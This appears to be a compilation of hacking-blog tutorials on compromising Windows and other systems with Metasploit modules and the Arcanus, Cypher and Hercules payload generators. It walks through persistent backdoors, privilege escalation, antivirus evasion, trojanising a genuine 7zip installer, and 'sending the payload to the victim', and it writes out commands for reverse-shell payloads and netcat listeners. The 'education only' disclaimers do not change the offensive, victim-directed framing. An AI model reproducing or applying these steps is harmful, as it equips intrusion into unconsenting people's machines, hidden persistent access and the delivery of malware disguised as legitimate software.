System hacking

Good morning aspiring hackers. Today we will see how to create a persistent windows backdoor with Metasploit. As soon as we get meterpreter shell on the target system, it is a good practice for a hacker ( pen tester ) to create a backdoor. Coming to that, what exactly is a backdoor? A backdoor is something which gives us continuous access to our target system.

Next question that comes to our mind is why we need to create a backdoor? Most of the methods we used to take control of our target systems are based on the vulnerabilities our target has. So once the vulnerabilities are patched, access to the target is lost. That’ why we need to create a backdoor.

This backdoor also answers a question many people ask like, once we get a meterpreter shell, can we shut down our machine? If we restart, will the connection be gone or still intact? .This backdoor needs only one one condition to be fulfilled. The target system should be out of its safest mode. i.e it shouldn’t  be turned off .
Now let us see how to create a persistent windows backdoor with Metasploit. In the meterpreter session we acquired on the target system, run the command “run persistence -h“. It will show you all the options we can set for our backdoor. All the options are self explanatory.


Now I want my backdoor to start as soon as the system starts. So I chose ‘X’ option. After starting, I want it to make connection attempt to my attacker system every three seconds, so I kept the interval(i) as 3. The port on which connection should be made is 443. The option (r) is remote system’s IP address i.e the IP of the system to which the connection should be made.

Remember this script will be installed on the target system. Run the script. As you can see, the file is installed in the autorun.


Now it’s time to start a listener on our attacker system. We have done it many times as shown below.


Change the options accordingly as we set in the persistence script and start the handler. If the system is live, we will get the meterpreter shell as shown below.





WARNING: This post is for education purpose only. Misuse this post at your own  risk.

Hello aspiring hackers. Today we will learn how to do Windows hacking with Arcanus Framework. Arcanus is a customized payload generator that can generate payloads which are undetectable by almost all of the antiviruses (till date ). This could be very useful in penetration testing.

Today we will see how to get a shell on a remote Windows system with this tool. Before we do anything, we need to install golang. Install Golang and then clone the Arcanus git as shown below.


Navigate to the ARCANUS directory created and view its contents. We should see a file ARCANUS_x86. We will generate a x_86 payload. First change its permissions as shown below.


Next run this file. You should see an ARCANUS logo as shown below.


You will see five options as shown below. Since we are about to hack windows, we will generate a windows payload by choosing option 2.


It will prompt you for the attacker IP address ( in our case the address of Kali Linux ) and a port on which you to listen for the reverse shell. Enter the values and hit “Enter”.


It will generate the payload and automatically start a listener as shown below.


The payload will be generated with the name “payload.exe” as shown below in the ARCANUS directory.


Next we need to send this payload to the victim. When the victim clicks on the payload we sent, we will get a shell of the victim as shown below. Happy hacking.


Good evening friends. Recently we have seen how to exploit server credential disclosure vulnerability in Webnms framework 5.2. This time around researchers found an arbitrary file upload vulnerability in the Webnms framework 5.2.

The Fileuploadservlet has a directory traversal vulnerability in the “filename” parameter which allows an unauthenticated user to upload a jsp file. We can only upload text files and to achieve RCE , they need to be dropped in ../jsp/ folder with names only as login.jsp or webstartXXX.jsp ( where XXX is string of any length).

Here is the code vulnerable to arbitrary file upload.

webnmsfileupload0Here are the names of the files that are uploaded in the process of exploitation. As you can see, the files are appended with random text.
Ok. Now let’s see how this exploit works. Start Metasploit and load the exploit as shown below.
We need to only set the target IP. The “check” command may not give you exact status of vulnerability as shown below.
 Set the meterpreter payload as shown below.
Type “run” command to execute the exploit. You should successfully get meterpreter session as shown below.


Good evening friends. Recently we have seen privilege escalation in Windows 7 with bypass uac exploit. Today we will see another exploit ms16-016 mrxdav.sys WEBDAV for privilege escalation in Windows 32bit machines. mrxdav.sys is a Windows driver. It is also called as Windows NT WebDav Minirdr and is used on Windows computers to utilize WebDAV servers. This exploit uses the Microsoft Web Distributed Authoring and Versioning (WebDAV) client to send specifically crafted input to a server to escalate privileges.

First hack the system with Metasploit by using one of the methods shown  in Latest hacks. Once you got a meterpreter session, check the privileges by typing command “getuid“.  We don’t have system privileges. Background the session by typing command “background” as shown below.


Load the ms16_016_webdav exploit as shown below.


We need only one option: session id of the session we just backgrounded. Set the session id as shown below. Run the exploit. The exploit ran successfully.


Now verify the privileges by typing “getuid” command once again as shown below.  We successfully got system privileges.



Hello friends. A while ago, we saw Poison Ivy buffer overflow exploit. This exploit is just like the Poison Ivy exploit but this time we target Darkcomet RAT. ( We will learn more about Darkcomet and RAT’s later ). In this case we can just download a file from the system running Darkcomet server.

Start Metasploit and load the exploit as shown below. Type command “show options” to see the options we need.  Look at the options. Although you are familiar with the usual options, there are some new options like NEWVERSION, STORE_LOOT and TARGETFILE.

-NEWVERSION : This exploit works on all darkcomet versions from 3.2 to above. If the version we are targeting is                                       above 5.1, we need to set this option to “true”.

-STORE_LOOT : If you set this option to true, the file we download will be stored in loot. If the option is false, the                                       contents of the file will be outputted to console.

-TARGETFILE : the file to be downloaded from the remote system.


Set the options as required. I have set store_loot option to false. If you don’t set any targetfile, by default it will download the config file of Darkcomet.


Let’s see by running the exploit. We can see the contents of Darkcomet configuration file as shown below.

dcometfd3 dcometfd4

Now let’s try to download another file. For this, we need the RC4 key of Darkcomet and the password you got in the config file is useless. But there is high probability that a password has not been set. Then we can just set the DC prefix as key and run the exploit as shown below.

Here I am trying to download the hosts file but encounter an error. It’s probably Windows UAC protecting us.


Now let’s create a text file in the admin folder called hello.txt with content as “hello hacker”. Now set this as target file and run the exploit. We can see that the text of the file is successfully displayed as shown below.


It is becoming difficult ( although not impossible ) day by day to hack Windows with no vulnerabilities like ms08_067  and of course a lot of security features enabled in Windows. But where there is a will, there is always a way.  Regsvr32 applocker bypass exploit is one such exploit. To understand how this exploit works, you need to know some things like dll and applocker.

AppLocker introduced in Windows 7 and Windows Server 2008 R2 provides administrators to set rules to allow or deny applications from running. These rules could be used for executable files (.exe and .com), scripts (.js, .ps1, .vbs, .cmd, and .bat), Windows Installer files (.msi and .msp), and DLL files (.dll and .ocx).

Ok, now what is a dll? A dll is a dynamic link library. A dynamic link library contains code and data which can be used by multiple programs at the same time. These libraries usually have  file extensions DLL, OCX (for libraries containing ActiveX controls), or DRV (for legacy system drivers).

Ok now let us see how this exploit works? Start Metasploit and load the exploit as shown below. Check the options we need to set? We can see that the reverse_tcp  meterpreter payload is already set. We will be using  this payload only.


Set all the required options as shown below. SRVhost and lhost are the IP address of our attacker system. After all options are set, type command “run” to run this exploit. It finishes by giving us a command as shown below. We need to run this command on our target system.

regsvr32 /s /n /u /i: scrobj.dll

Now let us understand this command discovered by researcher Casey Smith. Regsvr32 is a command line utility to register .dll files as command components in the registry. The ‘s’ option specifies regsvr32 to run silently without displaying any message boxes. The ‘n’ option specifies regsvr32 to not call DllRegisterServer. Since we have specified regsvr32 not to call DLLregisterserver, we should specify another address. We can do this by using “i” option and the IP address where we want ( attacker IP ).

You can see above that our exploit has created a link above for an sct file and a dll.


Now it’s time for our victim to type our command on his system. Copy the command on Notepad and save it as a batch file. Convert this file to exe and send this file to the victim. I have shown one method here.


Now we have to start a listener as shown below.


Set the options exactly as we set for the exploit. So, set the port to 1111. After all the options are set, type “run” to run this exploit. If you get an error like shown below, just change the port and type “run” again. That is just a minor glitch in Metasploit.

After typing “run” the exploit will hang on as shown below.


When our user clicks on our file we sent him, a meterpreter session is opened as shown below.


This may not directly take you to a meterpreter shell and hang on as shown above. Hit on CTRL+C to interrupt the session as shown below.


Next type “sessions -l” to see the available meterpreter sessions. when you get the available sessions type command “sessions -i 2” where “2” is its session id as shown below. Next, well you know what it is.


Bypass uac stands for bypassing user account control. User account control is the security measure introduced in Windows OS since Windows 7. It helps in preventing any malicious program from running with admin privileges. With UAC, applications and tasks always run with privileges of a standard or non-administrator account, unless a user authorizes administrator-level access to the system. UAC will not allow any unauthorized program from making any inadvertent changes to the system.

This may include even our meterpreter shell. We have seen many exploits where we got meterpreter shell. But when you check your privileges by typing command “getuid”, we can see that we are running as a standard user as shown below. When we try to get system privileges with  command “getsystem”, we can see it failed.


Bypass uac exploit as its name implies, bypasses the user account control security feature in Windows 7 to give us system privileges.  This is available in Metasploit. For this exploit to work, we should already have a meterpreter shell on our target system.

Now let use see how to get system privileges with this exploit. First background the current meterpreter session by typing command “background”. Next search for bypassuac exploit as shown below.


Load the exploit as shown below. Type command “show options” to see what options we need to set. We can see only one option is required: session. This is the session id number with which our previous meterpreter session was running. While we background our session, we saw that our session id number is 1. ( see the above image ). Set session id option to 1 as shown below.


Type command “exploit” to run our exploit. Type command “getsystem” to try to get the system privileges once again. This time we successfully got the system privileges as shown below.


Good morning friends. Today we will see about hacking Nagios with Metasploit. Nagios, also known as Nagios Core, is a free and open source computer-software application that is used to  monitor systems, networks and infrastructure. It offers monitoring and alerting services for servers, switches, applications and services. Italso alerts users when things go wrong and alerts them a second time when the problem has been resolved.

Versions of Nagios XI 5.2.7 and below suffer from SQL injection, auth bypass, file upload, command injection, and privilege escalation vulnerabilities. This exploit uses all these vulnerabilities to get a root shell on the victim’s machine. Now let’ see how this exploit works. Start Metasploit and load the module as shown below.


Let us set a new payload as shown below.


Set the target IP address as shown below. Use check command to see whether our target is vulnerable as shown below. If our target is vulnerable, type command “run” to execute our exploit. If everything goes right, we will get a shell on our target as shown below.


How to stay safe:

The current version of Nagios available is 5.29. Please update to the latest version.


Good morning aspiring hackers. Today we will see Windows hacking with Cypher. Cypher is a simple tool to automatically add shellcode to PE files. PE files means portable executable files.

But what is shellcode? It is a list of carefully crafted instructions that can be executed once the code is injected into a running application. So in simple terms, Cypher allows us to add shellcode to portable executable files like…. well it can be any Windows executable. Usually we use shellcode to get a remote shell or create a backdoor shell on our target system.  Cypher even allows us to get the powerful meterpreter shell.

Now let us see how to perform Windows hacking with this tool. First, let us git clone this tool into Kali Linux using commands as shown below.


Make sure you are in the same directory where cypher is cloned. It gives information on how to create different types of payloads. Let us add a reverse meterpreter shell  using the command shown below.


Now let us see all the options we specified.  : syntax of Cypher

-f                   :  the ‘f’ option stands for file. This is to specify the portable executable into which we want to create our                            backdoor. Remember that some executables are packed and don’t allow writing shell code. Test and                                use accordingly. Here, I’m using plink.exe located on my Desktop.

-t                   : the target OS for which you want to create this backdoor for. These include four options: 0,1,2,3. These                           are for Windows 7 32bit, Windows 7  64 bit, Windows 8.1 64bit and Windows 10 64bit respectively.                                 Here I have specified it as 1 since I’m testing it on Windows 7 64bit OS.

-d                  : offset. This is nothing but distance between the point where we are trying to enter our shellcode to the                           point where we are exactly placing our shellcode. Even if you don’t understand that sentence above, let                           me tell you why it’s important. The success of injecting our shellcode into an executable is that the                                   executable should work fine even after we inject our backdoor. The exe shouldn’t crash. By default, this                           value is set to four. But if your exe is crashing, set it to a greater value( I set it to 10) as I did above.

-H                : attacker’s IP address. In our case, IP address of Kali Linux.

-P                 : the port on which we want our shell back.

-p                 : Mind the lowercase. This stands for payload we want to set. ‘1’ stands for                                                                                  Windows/meterpreter/reverse_http.  The other options are,  

                        0 – windows/shell/reverse_tcp, 2- Windows/meterpreter/reverse_http + PrependMigrate,                                                3-  Windows/meterpreter/reverse_https, 4- Windows/meterpreter/reverse_https + PrependMigrate

After setting all the options, hit on Enter. The payload will be created with the same name but end with _evil as shown below. I leave sending the package to our intended victim to you but remember almost every antivirus can detect our file as malicious.

Since my blog is committed to make hacking as close to reality as possible, I have a solution. Google for “making Finfisher undetectable”. Open the first link Google search finds and follow some of the steps shown there. Trust me this works. Now send the package to the victim.


Now to listen to our reverse shell, we need a listener. Open Metasploit and create a reverse_http listener as shown below.


Set the required options like IP address and port. Note that they should be same as we specified while we added shell code to the file. Type run command. The exploit should hang on as shown below.


Now when our victim clicks on the file we sent, we should get a meterpreter reverse shell as shown below.


See how to hack Windows 10 with Hercules 


This post is for educational purpose only and remember that using this tutorial for any nefarious purpose will land you in prison for three years and a fine of two lakh rupees in India. Concerning other countries, Please refer your respective nation’s Cyber law.

Good news : Regardless of what the title says, this works even on windows 8 and 7

Good evening friends. I wanted to test the security of Windows 10 (actually of its antivirus ). Since remote exploits ceased to exist in Windows operating systems after Windows XP,  it can only be done by sending payloads in portable executables. The biggest challenge in sending these  malicious portable executables is bypassing its security mechanisms. Enter Hercules.

Hercules  is a special payload generator that can bypass all antivirus software. It has features like persistence and keylogger which make it too cool. Named after a Greek Hero, Hercules stands up for its name. In our testing, none of the antivirus was able to detect payload generated by Hercules. Now let us see how Hercules can be used to hack Windows 10 . In Kali Linux, open a terminal and type command git clone to clone Hercules into Kali Linux.


The tool is cloned into directory called Hercules. Navigate into that directory and view the contents of the directory as shown below. There is a directory called SOURCE. Move into that directory. There should be a file called HERCULES.go.


Now type command go build HERCULES.go  to build this file. Remember Linux is very strict, so be careful with uppercase and lowercase. Once you run that command, we will get another file with the same name but without any extension as shown below.


Now its time to create our payload. Type command,

./HERCULES 4444 -p windows/meterpreter/reverse_tcp -a x86 -l dynamic 

Let me explain this command. – IP address of our attacker system ( in our case Kali Linux )

4444 – the port number over which we want our victim system to connect to us.

-p – payload ( in this case, windows/meterpreter/reverse_tcp )

-a – architecture of the payload ( 64 bits or 32 bits )

-l – linking ( static or dynamic, dynamic linking reduces the payload size )

Hit on Enter. Our payload is created in the same directory.


Our payload’s name is payload.exe. Type “ls”  as shown below. Now send this file to our victim using your creativity.


On our Kali Linux, type command nc -l -p 4444. We are opening a netcat session on port 4444 ( the same port we set up above). Now when the user clicks on our payload, we will get the remote system’s shell as shown below.


Type command help to see all the commands we can execute on our target system.


For example, type command systeminfo to see all the system settings of our target. This was pretty simple. But this is a one time session, which means once you get out of this session you are disconnected from your victim.


So let’s add a little bit reality to our payload this time. Now we will add two things:persistence and embedding.

–persistence – Once our payload is executed by the victim, it will continually try to connect to our attacker system. So we can end the session and start it once again. The only condition is our victim’s system should be on and of course we should be listening.

–embed – we will add a genuine executable into our payload. Type command

./HERCULES 4444 -p windows/meterpreter/reverse_tcp -a x86 -l dynamic –persistence –embed=/root/Desktop/7z1602.exe 

Here we are embedding 7zip into our payload. Remember we need to send the payload created in SOURCE directory to our victim.


So when victim clicks on our payload to install it, UAC will prompt this window( the user should get a whiff here, if he is aware ).


When the user clicks on “yes”, the installation will progress normally on the victim’s system.


And on our attacker system, we should have already got the victim’s shell as shown below. As I already told, this is a persistent connection. Disconnect the session by typing ‘CTRL+C” and connect again with nc -l -p 4444 to get the session back.  Hope that was helpful. If you have any queries or doubts, please feel free to leave your comments.